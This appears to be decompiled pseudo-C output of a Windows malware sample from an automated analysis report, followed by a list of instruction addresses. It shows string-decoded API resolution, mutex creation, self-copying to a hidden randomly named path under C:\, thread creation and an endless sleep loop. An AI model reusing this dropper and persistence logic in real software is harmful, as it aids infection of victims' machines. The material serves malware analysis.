				 *0xfb02e0 = GetProcAddress(_t980, _t687);
				_t690 = E00F6CF90(_t1528, _t1682, 0x108, 0x11);
				_t1345 = _t690;
				E00F76570(8, _t687);
				_t1141 =  *0xfb0310; // 0x76a00000
				 *0xfb02dc = GetProcAddress(_t1141, _t690);
				_t1255 = E00F6CF90(_t1528, _t1682, 0x39b, 0x11);
				_t694 =  *0xfae458; // 0x5bdf
				_v8 = _t694;
				_t1471 = _t1465 + 0x58;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1682;
				 *0xfae458 =  *0xfae458 - 1;
				asm("fcomp qword [0xfa8230]");
				asm("fnstsw ax");
				asm("fld1");
				_t1687 =  *0xfae358 - st0;
				asm("fxch st0, st1");
				 *0xfae358 = _t1687;
				if((_t694 & 0x00000005) != 0) {
					st0 = _t1687;
				} else {
					_t1761 = _t1687 +  *0xfae450;
					 *0xfae450 = _t1761;
					_t1194 =  *0xfae0ec; // 0x2a1f8050
					_v8 = _t1194;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1761;
					asm("fcomp qword [0xfa8220]");
					asm("fnstsw ax");
					_t1530 = _t694 & 0x00000041;
					if((_t694 & 0x00000041) == 0) {
						 *0xfae608 =  *0xfae608 - 1;
						_t884 =  *0xfae608; // 0x6261
						 *0xfae398 = _t884;
					}
				}
				E00F76570(0x11, _t1345);
				_t982 =  *0xfae478; // 0x8f288571
				_v8 = _t982;
				_v20 =  *0xfae5b0 +  *0xfa821c;
				asm("fild dword [ebp-0x4]");
				 *0xfae478 = E00F7CABC();
				asm("fld1");
				_t1142 =  *0xfb0310; // 0x76a00000
				asm("faddp st1, st0");
				 *0xfb045c = GetProcAddress(_t1142, _t1255);
				_t698 = E00F6CF90(_t1530,  *0xfae5b0, 0x37ca, 0x16);
				E00F76570(0x11, _t1255);
				_t700 =  *0xfb0310; // 0x76a00000
				 *0xfafc24 = GetProcAddress(_t700, _t698);
				_t702 = E00F6CF90(_t1530,  *0xfae5b0, 0x3e03, 0x15);
				_t1256 = _t702;
				E00F76570(0x16, _t698);
				_t983 =  *0xfb0310; // 0x76a00000
				 *0xfb027c = GetProcAddress(_t983, _t702);
				E00F70530(E00F76570(0x15, _t702));
				_t707 = E00F6CF90(_t1530,  *0xfae5b0, 0x2877, 0xc);
				_v20 =  *0xfae1a4;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae1a4 =  *0xfae584;
				asm("fld1");
				asm("faddp st1, st0");
				GetEnvironmentVariableA(_t707, "C:\\Users\\hardz", 0x104);
				E00F76570(0xc, _t707);
				_t1476 = _t1471 + 0x40;
				_t710 = CreateMutexA(0, 0, 0); // executed
				 *0xfb04d0 = _t710;
				 *0xfafb1c = 1;
				_t711 = CreateMutexA(0, 0, 0); // executed
				 *0xfb0284 = _t711;
				 *0xfae47c =  *0xfae47c + 1;
				_t1695 =  *0xfae0a0;
				_t1143 =  *0xfae308; // 0x7ba2a37e
				_v20 = _t1695;
				_t712 =  *0xfae47c; // 0xd2bf0293
				_v8 = _t1143;
				asm("fild dword [ebp-0x4]");
				_v8 = _t712;
				asm("fsubr qword [ebp-0x10]");
				_t1696 = _t1695 -  *0xfa8218;
				_v28 = _t1696;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1696;
				 *0xfae308 =  *0xfae308 + 1;
				_t1698 =  *0xfae0f4 + _v20;
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t1531 = _t712 & 0x00000041;
				if((_t712 & 0x00000041) == 0) {
					_t1067 =  *0xfae1e8; // 0xa3c3
					_t1143 = _t1067;
					_v8 = _t1067;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1698;
					_t1698 =  *0xfae050 * _v20;
					 *0xfae050 = _t1698;
				}
				_t713 = CreateMutexA(0, 0, 0);
				_push(0x10);
				 *0xfb0758 = _t713;
				_t714 = E00F7D76C(_t1143, _t1256, 1, _t1531);
				_t1477 = _t1476 + 4;
				if(_t714 == 0) {
					 *0xfb04a4 = 0;
				} else {
					 *0xfb04a4 = E00F78230(_t714);
				}
				_t715 =  *0xfae55c; // 0x4f0f
				_v8 = _t715;
				 *0xfafb04 = 0x708;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1698;
				_t1700 =  *0xfae2d0 * _v20;
				 *0xfae55c = E00F7CABC();
				_t717 =  *0xfafc74; // 0x27311b0
				if( *_t717 != 0) {
					L49:
					E00F652E0(_t1700); // executed
					_t985 =  *0xfae00c; // 0x640f69d6
					_v8 = _t985 - 0x276f6dab;
					asm("fild dword [ebp-0x4]");
					asm("fsubp st1, st0");
					 *0xfae00c =  *0xfae00c + 1;
					_t719 = GetCommandLineA();
					_t1145 =  &_v644 - _t719;
					_v20 =  *0xfae360 -  *0xfae3c0;
					 *0xfae260 =  *0xfae260 + _v20;
					asm("fld1");
					_t1707 =  *0xfae3c0 - st0;
					asm("fxch st0, st1");
					 *0xfae3c0 = _t1707;
					_t1708 = _t1707 +  *0xfae360;
					 *0xfae360 = _t1708;
					do {
						_t987 =  *_t719;
						 *((char*)(_t1145 + _t719)) = _t987;
						_t719 =  &(_t719[1]);
						_t1540 = _t987;
					} while (_t987 != 0);
					_t1349 = E00F6CF90(_t1540, _t1708, 0x159f, 0x1f);
					_t1257 = E00F76AA0( &_v644, _t720);
					E00F76570(0x1f, _t720);
					_t1478 = _t1477 + 0x18;
					_t1541 = _t1257;
					if(_t1257 == 0) {
						L90:
						_t724 = E00F74820(GetCommandLineA());
						_t1479 = _t1478 + 4;
						_t1148 =  &_v644 - _t724;
						__eflags = _t1148;
						do {
							_t988 =  *_t724;
							 *((char*)(_t724 + _t1148)) = _t988;
							_t724 = _t724 + 1;
							__eflags = _t988;
						} while (_t988 != 0);
						_v644 = _t988;
						GetModuleFileNameA(0,  &_v644, 0x200);
						E00FA2BB6( &_v644);
						_t728 =  *0xfb0494; // 0x2731088
						_t1480 = _t1479 + 4;
						_t1150 =  &_v108 - _t728;
						__eflags = _t1150;
						do {
							_t990 =  *_t728;
							 *((char*)(_t728 + _t1150)) = _t990;
							_t728 = _t728 + 1;
							__eflags = _t990;
						} while (_t990 != 0);
						_t729 =  *0xfb031c; // 0x27310d8
						_t1152 =  &_v132 - _t729;
						__eflags = _t1152;
						do {
							_t991 =  *_t729;
							 *((char*)(_t729 + _t1152)) = _t991;
							_t729 = _t729 + 1;
							__eflags = _t991;
						} while (_t991 != 0);
						E00FA2BB6( &_v108);
						E00FA2BB6( &_v132);
						_t1481 = _t1480 + 8;
						__eflags =  *0xfb02d4;
						if(__eflags != 0) {
							L104:
							_t1154 =  &_v644;
							_push(_t1154); // executed
							_t733 = E00F6DB70(__eflags, _t1708); // executed
							_t1482 = _t1481 + 4;
							__eflags = _t733 - 1;
							if(__eflags > 0) {
								asm("fld1");
								asm("faddp st2, st0");
								asm("fxch st0, st1");
								 *0xfae488 = st0;
								_v20 =  *0xfae488;
								_t1708 =  *0xfae39c;
								_t802 =  *0xfae140; // 0x9d1c
								asm("fsubr qword [ebp-0x10]");
								_v8 = _t802;
								_v20 = _t1708;
								asm("fild dword [ebp-0x4]");
								asm("fsubr qword [ebp-0x10]");
								 *0xfae4c4 = E00F7CABC();
								asm("fsubr dword [0xfae39c]");
								 *0xfae39c = _t1708;
								E00F7DF62(0); // executed
							}
							E00F75410(_t1257, _t1349, __eflags, _t1708); // executed
							_v20 =  *0xfae5e4 -  *0xfa81d4;
							_t1712 =  *0xfae590 + _v20;
							 *0xfae590 = _t1712;
							_t736 = E00F7B950(0);
							 *0xfb04cc = _t1154;
							 *0xfb04c8 = _t736;
							E00F66790( &_v1412);
							_t1483 = _t1482 + 4;
							_t738 = 0;
							__eflags = 0;
							do {
								_t992 =  *((intOrPtr*)(_t1363 + _t738 - 0x580));
								 *((char*)(_t738 + 0xfafca0)) = _t992;
								_t738 = _t738 + 1;
								__eflags = _t992;
							} while (_t992 != 0);
							_t739 =  *0xfb04b0; // 0x2731180
							_t993 = _t739;
							do {
								_t1156 =  *_t739;
								_t739 = _t739 + 1;
								__eflags = _t1156;
							} while (_t1156 != 0);
							_t740 = _t739 - _t993;
							_t1350 = _t993;
							_t1259 = 0xfafc9f;
							__eflags = 0xfafca0;
							do {
								_t994 =  *(_t1259 + 1);
								_t1259 = _t1259 + 1;
								__eflags = _t994;
							} while (_t994 != 0);
							_t996 = _t740 >> 2;
							_t999 = memcpy(_t1259, _t1350, _t996 << 2) & 0x00000003;
							__eflags = _t999;
							_t743 = memcpy(_t1350 + _t996 + _t996, _t1350, _t999);
							_t1485 = _t1483 + 0x18;
							_t1001 = _t743;
							do {
								_t1157 =  *_t743;
								_t743 = _t743 + 1;
								__eflags = _t1157;
							} while (_t1157 != 0);
							_t744 = _t743 - _t1001;
							_t1351 = _t1001;
							_t1265 =  &_v1412 - 1;
							__eflags = _t1265;
							do {
								_t1002 =  *(_t1265 + 1);
								_t1265 = _t1265 + 1;
								__eflags = _t1002;
							} while (_t1002 != 0);
							_t1004 = _t744 >> 2;
							_t745 = memcpy(_t1265, _t1351, _t1004 << 2);
							_t1007 = _t745 & 0x00000003;
							memcpy(_t1351 + _t1004 + _t1004, _t1351, _t1007);
							_t1487 = _t1485 + 0x18;
							_t1269 = _t1351 + _t1007 + _t1007;
							_t748 =  *0xfb02e8(0x202,  &_v1812); // executed
							__eflags = _t748;
							if(__eflags != 0) {
								_t800 = E00F6CF90(__eflags, _t1712, 0x382b, 0xb);
								_t1487 = _t1487 + 8;
								_push(_t800);
								E00F72CC0();
							}
							_t1009 =  *0xfb050c; // 0x2731058
							_t1158 =  &_v644;
							_t749 = E00F76AA0( &_v644, _t1009);
							_t1488 = _t1487 + 8;
							__eflags = _t749;
							if(__eflags == 0) {
								_v20 =  *0xfae074;
								asm("fsubr qword [ebp-0x10]");
								asm("fsubp st1, st0");
								 *0xfae1b8 =  *0xfae000;
								_t1722 =  *0xfae074;
								asm("fld1");
								asm("fsubp st1, st0");
								_t797 = E00F76710(_t909, _t1269, _t1351, __eflags); // executed
								__eflags = _t797;
								if(_t797 == 0) {
									E00F7DF62(_t797);
								}
								E00F64510(_t1158, _t1722);
								_v20 =  *0xfae0a4;
								_t1712 =  *0xfae490;
								asm("fsubr qword [ebp-0x10]");
								 *0xfae0a4 = _t1712;
							}
							_t750 =  *0xfae180; // 0x7247
							_v8 = 0xc122fa40 - _t750;
							asm("fild dword [ebp-0x4]");
							 *0xfae510 = _t1712;
							 *0xfae180 =  *0xfae180 + 1;
							_t751 =  *0xfb050c; // 0x2731058
							_t752 = E00F76AA0( &_v644, _t751);
							_t1489 = _t1488 + 8;
							__eflags = _t752;
							if(_t752 != 0) {
								L130:
								_t1352 = 0;
								__eflags = 0;
								while(1) {
									_t1161 =  *0xfae020; // 0x2462
									_v8 = _t1161;
									asm("fild dword [ebp-0x4]");
									_v20 = _t1712;
									_t1012 =  *0xfb04b0; // 0x2731180
									_t1712 =  *0xfae200 + _v20;
									 *0xfae200 = _t1712;
									_t754 = E00F72E30(_t1012);
									_t1490 = _t1489 + 4;
									__eflags = _t754;
									if(__eflags == 0) {
										break;
									}
									_t1169 =  *0xfb04b0; // 0x2731180
									E00F696D0(_t1352, _t1169);
									_t1489 = _t1490 + 4;
									Sleep(0x7d0);
									_t1352 = _t1352 + 1;
									__eflags = _t1352 - 0xa;
									if(__eflags < 0) {
										continue;
									}
									break;
								}
								SetFileAttributesA("C:\helrrxxyrxmppnn\lxugwbfrq.exe", 0x80);
								CopyFileA( &_v644, "C:\helrrxxyrxmppnn\lxugwbfrq.exe", 0);
								SetFileAttributesA("C:\helrrxxyrxmppnn\lxugwbfrq.exe", 2);
								E00F76330(__eflags,  &_v1412);
								_t760 = E00F6CF90(__eflags, _t1712, 0x30b4, 0x1f);
								_t910 = _t760;
								_t1014 = _t760;
								do {
									_t1162 =  *_t760;
									_t760 = _t760 + 1;
									__eflags = _t1162;
								} while (_t1162 != 0);
								_t761 = _t760 - _t1014;
								_t1353 = _t1014;
								_t1271 =  &_v1412 - 1;
								__eflags = _t1271;
								do {
									_t1015 =  *(_t1271 + 1);
									_t1271 = _t1271 + 1;
									__eflags = _t1015;
								} while (__eflags != 0);
								_t1017 = _t761 >> 2;
								_t1020 = memcpy(_t1271, _t1353, _t1017 << 2) & 0x00000003;
								memcpy(_t1353 + _t1017 + _t1017, _t1353, _t1020);
								_t1275 = _t1353 + _t1020 + _t1020;
								_t764 = E00F6CF90(__eflags, _t1712, 0x29a1, 3);
								E00F76570(0x1f, _t910);
								E00F7D699( &_v1412, _t764);
								E00F76570(3, _t764);
								_t768 =  *0xfae51c; // 0x7027
								_t1715 =  *0xfae520 -  *0xfa81d0;
								_v8 = _t768;
								_v20 = _t1715;
								asm("fild dword [ebp-0x4]");
								asm("fcomp qword [ebp-0x10]");
								asm("fnstsw ax");
								__eflags = _t768 & 0x00000005;
								if((_t768 & 0x00000005) == 0) {
									_t1715 =  *0xfae5b8 -  *0xfa81c8;
									 *0xfae5b8 = _t1715;
								}
								_t1164 =  *0xfafb04; // 0x708
								_push(_t1164);
								E00F69970(_t910, _t1275,  &_v1412);
								_t771 = E00F6CF90(__eflags, _t1715, 0x3f8d, 8);
								_t772 = E00F6CF90(__eflags, _t1715, 0x159f, 0x1f);
								_t1023 =  *0xfae2fc; // 0x87a9e522
								_v8 = _t1023 + 0x1b342e2e;
								asm("fild dword [ebp-0x4]");
								_push( &_v644);
								_v20 = _t1715;
								 *0xfae0a0 =  *0xfae0a0 + _v20;
								 *0xfae2fc =  *0xfae2fc - 1;
								E00F7E0C2(0xfb0518, 0x21c, _t771, _t772);
								E00F76570(8, _t771);
								E00F76570(0x1f, _t772);
								E00F66260( *0xfae0a0 + _v20, "C:\helrrxxyrxmppnn\lxugwbfrq.exe", 0xfb0518);
								E00F7C990( &_v644, 0, 0x200);
								E00F7C990( &_v1412, 0, 0x300);
								_t780 = CreateThread(0, 0, E00F6BFF0, 0, 0, 0);
								__eflags =  *0xfb030c;
								 *0xfb047c = _t780;
								if( *0xfb030c != 0) {
									_t1166 =  *0xfae598; // 0x0
									_t1167 =  *0xfae264; // 0x353dd48b
									_t1168 = _t1167 + 0x85983389 - _t1166;
									__eflags = _t1168;
									 *0xfae558 = _t1168;
									E00F6CDB0();
								}
								L141:
								Sleep(0xc350);
								goto L141;
							} else {
								_t1170 =  *0xfafc7c; // 0x4a0
								CloseHandle(_t1170);
								SetFileAttributesA( &_v1412, 0x80); // executed
								_t788 = CopyFileA( &_v644,  &_v1412, 0); // executed
								__eflags = _t788;
								if(_t788 == 0) {
									L129:
									_t1028 =  *0xfb0284; // 0x490
									E00F6F090(_t1712, _t1028);
									_t1489 = _t1489 + 4;
									E00F7DF62(0); // executed
									goto L130;
								}
								_t792 = SetFileAttributesA( &_v1412, 2); // executed
								__eflags =  *0xfb030c;
								if( *0xfb030c == 0) {
									L127:
									E00F66A90( &_v1412);
									_t1497 = _t1489 + 4;
									L128:
									Sleep(0x3e8); // executed
									E00F66260(_t1712,  &_v1412, 0); // executed
									_t1489 = _t1497 + 8;
									goto L129;
								}
								E00F7B350(_t792,  &_v1412); // executed
								_t1489 = _t1489 + 4;
								__eflags =  *0xfb030c;
								if( *0xfb030c == 0) {
									goto L127;
								}
								__eflags =  *0xfb076c - 6;
								if( *0xfb076c >= 6) {
									goto L128;
								}
								goto L127;
							}
						}
						_t1031 =  *0xfb050c; // 0x2731058
						_t805 = E00F76AA0( &_v644, _t1031);
						_t1481 = _t1481 + 8;
						__eflags = _t805;
						if(__eflags != 0) {
							goto L104;
						}
						_t807 = E00F76AA0( &_v644,  &_v108);
						_t1481 = _t1481 + 8;
						__eflags = _t807;
						if(__eflags != 0) {
							goto L104;
						}
						_t809 = E00F76AA0( &_v644,  &_v132);
						_t1481 = _t1481 + 8;
						__eflags = _t809;
						if(__eflags != 0) {
							goto L104;
						}
						E00F64070(_t1708,  &_v644, _v32);
						_t1498 = _t1481 + 8;
						E00F6D840(_t1708);
						__eflags =  *0xfb02e4;
						if(__eflags == 0) {
							L53:
							E00F7DF62(0);
							L54:
							_t909 =  &(_t909[1]);
							_t1277 = E00F76AA0(_t909, E00F6CF90(_t1542, _t1708, 0x1593, 2));
							E00F76570(2, _t813);
							_t1499 = _t1498 + 0x18;
							_t1543 = _t1277;
							if(_t1277 == 0) {
								E00F7DF62(_t1277);
							}
							 *_t1277 = 0;
							_t816 = E00F76330(_t1543,  &_v1412);
							_t1176 =  *0xfae00c; // 0x640f69d6
							_v8 = _t1176;
							asm("fild dword [ebp-0x4]");
							_t1500 = _t1499 + 4;
							_v20 = _t1708;
							asm("fucompp");
							asm("fnstsw ax");
							_t1730 =  *0xfae540;
							asm("fld1");
							asm("faddp st1, st0");
							_t1544 = _t816 & 0x00000044;
							if((_t816 & 0x00000044) == 0) {
								_t853 =  *0xfae1c0; // 0xa814
								_v8 = _t853;
								_t1752 =  *0xfae354 +  *0xfa820c -  *0xfa8208;
								_v20 = _t1752;
								asm("fild dword [ebp-0x4]");
								_t1730 = _t1752 + _v20;
								 *0xfae1c0 = E00F7CABC();
							}
							_t1035 = E00F6CF90(_t1544, _t1730, 0x30b4, 0x1f);
							_t1501 = _t1500 + 8;
							_t1357 = _t1035;
							do {
								_t1177 =  *_t1035;
								_t1035 = _t1035 + 1;
							} while (_t1177 != 0);
							_t1178 = _t1035 - _t1357;
							_t1279 =  &_v1412 - 1;
							do {
								_t1037 =  *(_t1279 + 1);
								_t1279 = _t1279 + 1;
							} while (_t1037 != 0);
							_t1039 = _t1178 >> 2;
							_t818 = memcpy(_t1279, _t1357, _t1039 << 2);
							memcpy(_t1357 + _t1039 + _t1039, _t1357, _t1178 & 0x00000003);
							E00F76570(0x1f, _t818);
							_t1179 =  *0xfae5dc; // 0xf99f
							_t1044 =  *0xfae588; // 0xb5d5
							_t1045 =  *0xfae34c; // 0x80000000
							_t822 = _t1179 + _t1044;
							 *0xfafb04 = 0x708;
							_t204 = _t822 + 0x5ece6a44; // 0xdece6a44
							_t1181 = _t1045 + _t204;
							 *0xfae5dc = _t1181;
							 *0xfae34c =  *0xfae34c - 1;
							_t1504 = _t1501 + 0x20;
							_t1257 = 0;
							while(1) {
								_t823 =  *0xfb050c; // 0x2731058
								_t824 = E00F72E30(_t823);
								_t1504 = _t1504 + 4;
								if(_t824 != 0) {
									_t1181 =  &_v1412;
									_t825 = E00F7CDD8(_t1181, _t1181,  &_v84);
									_t1504 = _t1504 + 8;
									__eflags = _t825;
									if(_t825 != 0) {
										Sleep(0xd05);
										_t852 = E00F7CDD8(_t1181,  &_v1412,  &_v84);
										_t1504 = _t1504 + 8;
										__eflags = _t852;
										if(_t852 != 0) {
											_v52 = _t1257;
											_v48 = _t1257;
										}
										 *0xfae270 =  *0xfae270 +  *0xfa8200;
									}
								} else {
									_v52 = _t1257;
									_v48 = _t1257;
								}
								_t827 = E00F7B950(0);
								_t1047 = _v48;
								_t1358 = _v52;
								_t1550 = _t1181 - _t1047;
								if(_t1550 <= 0 && (_t1550 < 0 || _t827 < _t1358)) {
									_t827 = _t1358 + 0x76c;
									_t1181 = _t1047;
									asm("adc edx, edi");
								}
								_t828 = _t827 - _t1358;
								asm("sbb edx, ecx");
								_t1552 = _t1181 - _t1257;
								if(_t1552 > 0 || _t1552 >= 0 && _t828 > 0x762) {
									break;
								}
								_v20 =  *0xfae5e4;
								 *0xfae5e4 =  *0xfae39c * _v20;
								asm("fld1");
								asm("faddp st1, st0");
								Sleep(0x3e8);
								_v20 =  *0xfae2a8;
								asm("fsubr qword [ebp-0x10]");
								 *0xfae2a8 =  *0xfae50c -  *0xfa81f8;
								asm("fld1");
								asm("faddp st1, st0");
							}
							_t1731 =  *0xfae3a0;
							 *0xfae014 = E00F7CABC();
							_t1349 = 0;
							while(1) {
								_t1182 =  *0xfb050c; // 0x2731058
								_t830 = E00F72E30(_t1182);
								_t1505 = _t1504 + 4;
								__eflags = _t830;
								if(_t830 == 0) {
									break;
								}
								_t848 =  *0xfb050c; // 0x2731058
								 *0xfae4b0 =  *0xfae4b0 +  *0xfa81f0;
								E00F696D0(_t1349, _t848);
								_t1504 = _t1505 + 4;
								_t1731 =  *0xfae4d8 +  *0xfa81e8 -  *0xfa81e0;
								asm("fsubp st1, st0");
								 *0xfae098 = _t1731;
								Sleep(0x7d0);
								_t1349 = _t1349 + 1;
								__eflags = _t1349 - 0xa;
								if(_t1349 < 0xa) {
									continue;
								}
								break;
							}
							_t831 = E00F7CDD8(_t1182, _t909,  &_v84);
							_t1506 = _t1505 + 8;
							 *0xfae498 = 0x6f4abbb1;
							__eflags = _v64 - _v32;
							if(__eflags != 0) {
								L82:
								GetModuleFileNameA(0,  &_v1412, 0x200);
								SetFileAttributesA(_t909, 0x80);
								_t1731 =  *0xfae314 -  *0xfa81d8;
								 *0xfae314 = _t1731;
								CopyFileA( &_v1412, _t909, 0);
								_t1349 = E00F6CF90(__eflags, _t1731, 0xfe5, 0xa);
								_t837 = E00F76AA0(_t909, _t836);
								_t1257 = _t837;
								E00F76570(0xa, _t836);
								_t1506 = _t1506 + 0x18;
								__eflags = _t837;
								if(__eflags != 0) {
									L85:
									_t839 =  *0xfae180; // 0x7247
									_t1051 = _t839 + 0x78fc3db0;
									__eflags = _t1051;
									 *0xfae0c4 = _t1051;
									_push(0x80);
									L86:
									SetFileAttributesA(_t909, ??);
									L87:
									E00F66260(_t1731, _t909, 0);
									_t1184 =  *0xfae3ec; // 0x94572d35
									_v8 = _t1184;
									asm("fild dword [ebp-0x4]");
									_t1478 = _t1506 + 8;
									_v20 = _t1731;
									_t1708 =  *0xfae1b8;
									_t842 =  *0xfae4d4; // 0x84901a2a
									_v8 = _t842;
									asm("fild dword [ebp-0x4]");
									asm("fsubp st1, st0");
									asm("fcomp qword [ebp-0x10]");
									asm("fnstsw ax");
									__eflags = _t842 & 0x00000001;
									if((_t842 & 0x00000001) == 0) {
										_t1052 =  *0xfae1f8; // 0x3d8
										_t1185 =  *0xfae478; // 0x8f288571
										_t1186 = _t1185 + _t1052;
										__eflags = _t1186;
										_v8 = _t1186;
										asm("fild dword [ebp-0x4]");
										 *0xfae1b8 = _t1708;
									}
									E00F7DF62(0);
									goto L90;
								}
								_t1349 = E00F6CF90(__eflags, _t1731, 0x2c93, 9);
								_t846 = E00F76AA0(_t909, _t845);
								_t1733 =  *0xfae5e4;
								_t1187 =  *0xfae1fc; // 0x80000000
								_v28 = _t1733;
								_v8 = _t1187 + 0x40011bf;
								asm("fild dword [ebp-0x4]");
								_t1257 = _t846;
								_v20 = _t1733;
								asm("fsubr qword [ebp-0x10]");
								asm("fsubr qword [ebp-0x18]");
								 *0xfae5e4 =  *0xfae338;
								_t1731 =  *0xfae338;
								asm("fld1");
								asm("fsubp st1, st0");
								 *0xfae338 = _t1731;
								 *0xfae1fc =  *0xfae1fc + 1;
								E00F76570(9, _t845);
								_t1506 = _t1506 + 0x18;
								__eflags = _t846;
								if(_t846 != 0) {
									goto L85;
								}
								_push(2);
								goto L86;
							}
							__eflags = _t831 - _t1257;
							if(__eflags == 0) {
								goto L87;
							}
							goto L82;
						}
						_v8 = LoadLibraryA(E00F6CF90(__eflags, _t1708, 0x1e0b, 0xb));
						_t858 = E00F6CF90(__eflags, _t1708, 0xbe3, 0xc);
						E00F76570(0xb, _t856);
						_t909 = GetProcAddress(_v8, _t858);
						E00F76570(0xc, _t858);
						_t1349 = E00F6CF90(__eflags, _t1708, 0x1ad0, 0x202);
						_t252 = _t1349 + 4; // 0x4
						_t1055 = _t252;
						_t864 = _t1055;
						_t1509 = _t1498 + 0x28;
						_t253 = _t864 + 1; // 0x5
						_t1257 = _t253;
						do {
							_t1189 =  *_t864;
							_t864 = _t864 + 1;
							__eflags = _t1189;
						} while (_t1189 != 0);
						_t865 = _t864 - _t1257;
						__eflags = _t865;
						 *_t909(0, _t1055, _t865 + _t1349 + 5,  *_t1349);
						_t1056 =  *0xfae040; // 0xe6acfb4
						_v8 = _t1056;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1708;
						_t1708 =  *0xfae450 + _v20;
						 *0xfae040 = E00F7CABC();
						E00F76570(0x202, _t1349);
						_t1481 = _t1509 + 8;
						E00F7DF62(0);
						goto L104;
					}
					_t871 =  *0xfae3d4; // 0x977dff82
					_v8 = _t871;
					asm("fild dword [ebp-0x4]");
					_v8 = _t1708;
					 *0xfae3d4 = E00F7CABC();
					_t1708 =  *0xfae054;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae054 = _t1708;
					_t909 = E00F76AA0(_t1257 + 0xc, E00F6CF90(_t1541, _t1708, 0x1593, 2));
					E00F76570(2, _t873);
					_t1498 = _t1478 + 0x18;
					_t1542 = _t909;
					if(_t909 != 0) {
						goto L54;
					}
					goto L53;
				} else {
					E00FA28A9(GetTickCount(), _t717, 0x24);
					 *0xfae1e8 =  *0xfae1e8 + 1;
					_t1756 =  *0xfae520;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae520 = _t1756;
					_t1191 =  *0xfae1e8; // 0xa3c3
					_v8 = _t1191;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1756;
					asm("fsubr qword [ebp-0x10]");
					_v20 =  *0xfae520 -  *0xfa8214;
					_t1700 =  *0xfae360 + _v20;
					 *0xfae360 =  *0xfae360 + _v20;
					_t1057 = E00F6CF90( *0xfae1e8,  *0xfae360 + _v20, 0x2c9e, 2);
					_t1510 = _t1477 + 0x14;
					_t1361 = _t1057;
					do {
						_t1192 =  *_t1057;
						_t1057 = _t1057 + 1;
					} while (_t1192 != 0);
					_t1286 =  *0xfafc74; // 0x27311b0
					_t1193 = _t1057 - _t1361;
					_t1287 = _t1286 - 1;
					do {
						_t1059 =  *(_t1287 + 1);
						_t1287 = _t1287 + 1;
					} while (_t1059 != 0);
					_t1061 = _t1193 >> 2;
					_t880 = memcpy(_t1287, _t1361, _t1061 << 2);
					memcpy(_t1361 + _t1061 + _t1061, _t1361, _t1193 & 0x00000003);
					E00F76570(2, _t880);
					_t1477 = _t1510 + 0x20;
					 *0xfafc84 = 1; // executed
					goto L49;
				}
			}

0x00f6138a
0x00f6138d
0x00f61393
0x00f6139d
0x00f613a0
0x00f613ae
0x00f613bb
0x00f613cd
0x00f613d3
0x00f613d9
0x00f613e1
0x00f613ec
0x00f613f2
0x00f613fe
0x00f61402
0x00f61404
0x00f6140a
0x00f61410
0x00f6141b
0x00f6141e
0x00f61421
0x00f61429
0x00f6142e
0x00f61441
0x00f61447
0x00f6144d
0x00f61453
0x00f61459
0x00f6145f
0x00f61465
0x00f6146b
0x00f61471
0x00f61477
0x00f6147d
0x00f61483
0x00f6148f
0x00f61495
0x00f6149e
0x00f614a1
0x00f614a4
0x00f614a7
0x00f614aa
0x00f614b9
0x00f614c2
0x00f614c5
0x00f614c8
0x00f614ca
0x00f614cf
0x00f61511
0x00f614d1
0x00f614d9
0x00f614e5
0x00f614ee
0x00f614f1
0x00f614f7
0x00f614fa
0x00f614fd
0x00f61503
0x00f61509
0x00f61509
0x00f61513
0x00f61519
0x00f6151c
0x00f6151f
0x00f61525
0x00f6152b
0x00f61531
0x00f61537
0x00f6153d
0x00f61543
0x00f61549
0x00f61554
0x00f61559
0x00f6155c
0x00f61561
0x00f61563
0x00f61565
0x00f6156e
0x00f61571
0x00f61574
0x00f61589
0x00f6158b
0x00f61593
0x00f61599
0x00f6159f
0x00f615a2
0x00f615a4
0x00f615aa
0x00f615aa
0x00f615b6
0x00f615bb
0x00f615c8
0x00f615cd
0x00f615d5
0x00f615e2
0x00f615e5
0x00f615f6
0x00f61607
0x00f61611
0x00f61616
0x00f61627
0x00f61631
0x00f61634
0x00f61640
0x00f61652
0x00f61666
0x00f6166b
0x00f61677
0x00f6167c
0x00f6168d
0x00f61692
0x00f6169d
0x00f616a8
0x00f616ad
0x00f616b5
0x00f616bb
0x00f616c0
0x00f616cb
0x00f616db
0x00f616e0
0x00f616ea
0x00f616f2
0x00f61703
0x00f61708
0x00f61712
0x00f61717
0x00f61726
0x00f6172b
0x00f6173a
0x00f61744
0x00f61749
0x00f6175c
0x00f61761
0x00f6176b
0x00f61770
0x00f61784
0x00f61789
0x00f6178e
0x00f61794
0x00f61797
0x00f6179c
0x00f617a5
0x00f617b0
0x00f617b5
0x00f617ba
0x00f617cd
0x00f617d2
0x00f617dc
0x00f617e1
0x00f617f0
0x00f617fa
0x00f617ff
0x00f61812
0x00f61818
0x00f6181b
0x00f61824
0x00f61827
0x00f6182d
0x00f61832
0x00f61846
0x00f6184b
0x00f61855
0x00f6185a
0x00f61860
0x00f61865
0x00f61875
0x00f61878
0x00f6187d
0x00f6188c
0x00f61891
0x00f6189b
0x00f618a0
0x00f618b3
0x00f618b8
0x00f618c2
0x00f618c7
0x00f618db
0x00f618e8
0x00f618ea
0x00f618ef
0x00f61906
0x00f61909
0x00f6190b
0x00f61912
0x00f61912
0x00f61918
0x00f61929
0x00f6192e
0x00f61938
0x00f6193d
0x00f61951
0x00f61956
0x00f61960
0x00f61965
0x00f61978
0x00f6197d
0x00f61987
0x00f6198c
0x00f619a0
0x00f619a5
0x00f619af
0x00f619b4
0x00f619c8
0x00f619cd
0x00f619d7
0x00f619e2
0x00f619ec
0x00f619f8
0x00f61a04
0x00f61a13
0x00f61a18
0x00f61a22
0x00f61a27
0x00f61a3b
0x00f61a40
0x00f61a4a
0x00f61a4f
0x00f61a6a
0x00f61a74
0x00f61a7a
0x00f61a80
0x00f61a8a
0x00f61a8f
0x00f61aa2
0x00f61aa7
0x00f61ab1
0x00f61ab6
0x00f61aca
0x00f61acf
0x00f61ad9
0x00f61ade
0x00f61af2
0x00f61af7
0x00f61afe
0x00f61b0d
0x00f61b13
0x00f61b16
0x00f61b1c
0x00f61b23
0x00f61b28
